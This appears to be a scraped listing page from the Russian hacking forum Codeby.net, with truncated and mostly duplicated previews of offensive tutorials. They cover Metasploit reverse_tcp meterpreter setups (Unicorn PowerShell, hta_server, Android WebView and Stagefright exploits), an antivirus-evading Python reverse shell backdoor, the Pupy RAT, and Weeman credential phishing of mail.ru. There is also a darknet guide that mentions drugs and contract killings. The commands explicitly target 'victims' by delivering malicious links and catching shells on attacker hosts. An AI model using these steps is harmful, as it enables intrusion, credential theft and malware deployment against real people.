Форум информационной безопасности - Codeby.net
Статья Быстрый способ получить meterpreter
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.
Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.
Вообщем ближе к делу.
Качаем:
Запускаем.Смотрим help.
Выполняем команду
Получаем два интересных нам файла...
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.
Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.
Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
Запускаем.Смотрим help.
Выполняем команду
Код:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.137.137 443
Получаем два интересных нам файла...
PUPY Remote Administration Tool (RAT)
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.
Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...
После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.
Я считаю что его можно отлично использовать для:
Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...
После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.
Я считаю что его можно отлично использовать для:
- security research...
Статья Обход антивируса (Reverse Python Shell) 100% FUD
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
для упаковки в бинарный файл.
listener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit ...
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
- reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
- может быть упакован в "exe" файл используя pyinstaller
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.pylistener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit ...
Как попасть в Darknet? Полное Руководство !
Век интернета настал дорогие друзья ибо без него порой никак. Все знаю и умеют пользоваться популярными сервисами так сказать белым и контролируемым правительством и поисковиками интернетом. Но что же происходит на другой стороне, то что остается без контроля и что является запретным? Как же туда попасть? И что же там можно найти?
Что такое Darknet
Именно это место - а точнее все что нельзя найти простыми способами использованием поисковиков и называется Deepweeb (Глубокая паутина или же просто и изящно Darknet). Найти в даркнете можно что угодно от книг к самым большим извращениям и даже к покупке наркотиков и заказу убийств, насилию, и настоящих мега хакеров.
Возникает вопрос, а легально ли все это? К сожалению нет, правительство пытается внедрить туда своих агентов для борьбы с этим, но пока что все безуспешно. Что бы эта зона оставалась без контроля был придуман Биткойн и разные...
Что такое Darknet
Именно это место - а точнее все что нельзя найти простыми способами использованием поисковиков и называется Deepweeb (Глубокая паутина или же просто и изящно Darknet). Найти в даркнете можно что угодно от книг к самым большим извращениям и даже к покупке наркотиков и заказу убийств, насилию, и настоящих мега хакеров.
Возникает вопрос, а легально ли все это? К сожалению нет, правительство пытается внедрить туда своих агентов для борьбы с этим, но пока что все безуспешно. Что бы эта зона оставалась без контроля был придуман Биткойн и разные...
Статья Android WebView Exploit или взлом андроида по ссылке
Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам...
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface
3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам...
Статья Эксплойт Stagefright или еще один способ взлома телефона на базе андроид
Добрый вечер, я хочу поделиться с вами, как можно получить доступ к телефону на базе андройд используя вредоносную ссылку. Сразу оговорюсь , данный метод работает на старых версиях андройд. И так поехали...
Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole. Дальше все делаем согласно скринам, я думаю так будет более понятно.
Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой:
После запуска эксплойта, сгенерируется ссылка и запуститься сервер.Ссылку забрасываем жертве.
Итогом всему у вас будет открытая сессия.
Всем спасибо за внимания, удачного пентеста.
Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole. Дальше все делаем согласно скринам, я думаю так будет более понятно.
Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой:
Код:
ifconfigПосле запуска эксплойта, сгенерируется ссылка и запуститься сервер.Ссылку забрасываем жертве.
Итогом всему у вас будет открытая сессия.
Всем спасибо за внимания, удачного пентеста.
Статья Weeman: Phishing - web-сервер
Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
> git clonegithub.com/Hypsurus/weeman
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
> cd weeman/
> ls –a
> chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции)
> show (посмотрим текущие настройки)
Используем weeman на примере mail.ru.
> set url hppts://mail.ru
> set port 8080
> set action_url https://mail.ru
> run
Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый...
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
> git clone
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
> cd weeman/
> ls –a
> chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции)
> show (посмотрим текущие настройки)
Используем weeman на примере mail.ru.
> set url hppts://mail.ru
> set port 8080
> set action_url https://mail.ru
> run
Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый...
Статья Взлом удаленного ПК: HTA-server
Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Теперь, если все проделано, верно, видим экран с таким содержимым:
Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто доставить, а убедить в том, что по ней необходимо перейти
А третья, собственно, о том, что был поднят веб-сервер на локальном адресе.
Перейдем по ссылке на целевой машине:
...
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Код:
use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploitТеперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто доставить, а убедить в том, что по ней необходимо перейти
А третья, собственно, о том, что был поднят веб-сервер на локальном адресе.
Перейдем по ссылке на целевой машине:
Статья Лучшие Android-инструменты для пентестинга и кибербезопасности 2025
Доброго времени суток, друзья!
Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач.
Для тех, кто стремится к постоянному развитию в области кибербезопасности, на Codeby.net регулярно публикуются актуальные материалы. Рекомендуем ознакомиться с новейшими статьями, которые помогут вам не потерять мотивацию при самообучении и освоить практические навыки, например: «Сам себе наставник: как не потерять мотивацию при самообучении кибербезопасности» и «Как обучаться информационной безопасности на практике: гид по CTF-платформам».
Мы будем использовать следующий формат, чтобы было удобно ориентироваться:
Название приложения
Краткое описание и основные возможности.
Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач.
Для тех, кто стремится к постоянному развитию в области кибербезопасности, на Codeby.net регулярно публикуются актуальные материалы. Рекомендуем ознакомиться с новейшими статьями, которые помогут вам не потерять мотивацию при самообучении и освоить практические навыки, например: «Сам себе наставник: как не потерять мотивацию при самообучении кибербезопасности» и «Как обучаться информационной безопасности на практике: гид по CTF-платформам».
Мы будем использовать следующий формат, чтобы было удобно ориентироваться:
Название приложения
Краткое описание и основные возможности.
- Сфера применения: (Например, MITM...